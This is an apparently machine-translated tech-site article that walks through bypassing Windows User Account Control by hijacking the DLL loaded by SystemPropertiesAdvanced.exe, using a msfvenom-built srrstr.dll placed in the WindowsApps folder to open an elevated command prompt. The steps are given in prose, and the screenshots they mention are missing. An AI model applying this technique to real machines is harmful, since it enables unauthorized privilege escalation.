Shulou(Shulou.com)06/02 Report--

Today, I will talk to you about how to achieve UAC bypass, many people may not know much about it. In order to make you understand better, the editor has summarized the following content for you. I hope you can get something according to this article.

I. brief introduction of basic knowledge

UAC:

User account Control (User Account Control, UA C) is a control mechanism adopted by Microsoft in its Windows Vista and higher operating systems to protect the system from unnecessary changes and improve the stability and security of the operating system.

Administrators generally run administrator tasks with less privileges, and low-privilege administrators are called protected administrators. When performing administrator tasks, these administrators can enhance permissions to perform tasks through the user interaction interface.

When performing administrator tasks, ordinary users will be required to be promoted to administrator privileges before performing the task.

DLL file: dynamic link library file, most executable files are not a complete file, it is divided into multiple DLL files, most EXE programs will be called when the DLL file.

The process of calling the DLL file when the program is running:

1. The directory where the program is located

two。 System directory that is SYSTEM32 directory

3.16-bit system directory, namely SYSTEM directory

4.Windows directory

5. The current directory where DLL was loaded

Directories listed in the 6.PATH environment variable

In the process of calling the DLL file, the executable will look in the high-priority directory (first look for the directory where the program is located), when it cannot find it, it will look in the lower-priority directory in turn, and when the program finds the required DLL file in the high-priority directory, it will not look in the low-priority directory.

The right to execute the executable program:

Some executables automatically elevate their rights when they are executed, and do not trigger the UAC mechanism. There are elements in these application listings.

How to check if there are elements in the executable list:

1. Findstr/C: "true" xxx.exe

2. Use sigcheck (Microsoft Digital signature tool)

Attach a tool link:

Https://docs.microsoft.com/zh-cn/sysinternals/downloads/sigcheck

Here, an executable file that can be automatically granted rights is used, and the directory in which the dll is called can be written to a malicious dll file, thus carrying out dll hijacking:

C:\ Windows\ SysWOW64\ SystemPropertiesAdvanced.exe

Second, successfully bypass the UAC mechanism through DLL hijacking

The C:\ Windows\ SysWOW64\ SystemPropertiesAdvanced.exe file is used here to perform dll hijacking to bypass the UAC mechanism

1. First check whether there are any elements in the file list, which can be carried out by default.

2. Use the process monitor tool to view the process of calling the dll file when SystemPropertiesAdvanced.exe is executed

Add a filter to make it easy to find the calling procedure of dll:

The Windowsapps directory is the cache / download application directory of the win10 App Store, which allows users to write to it. You can hijack DLL and bypass the UAC mechanism by constructing malicious DLL files and putting them in.

3. Construct payloads through msfvenom, put the constructed srrstr.dll into the windowssapps directory, and bypass UAC through the constructed CMD.exe.

4. Run SystemPropertiesAdvanced.exe again to check the hijacking effect of DLL, and it is found that the UAC mechanism has been successfully bypassed. (note: the original program cannot be run normally without a second call at runtime, which may affect the stability of the hijacked program. The malicious DLL here only pops up CMD. Even if the hijacked program collapses, CMD pops up successfully, which has little impact on the experimental results.) The new CMD does not trigger a UAC prompt that can be tested with the regedit command:

As you can see, the cmd.exe at this time has a high level of integrity:

In addition, the session can be hijacked by DLL in the same way, and the effect is as follows:

After reading the above, do you have any further understanding of how to achieve UAC bypass? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.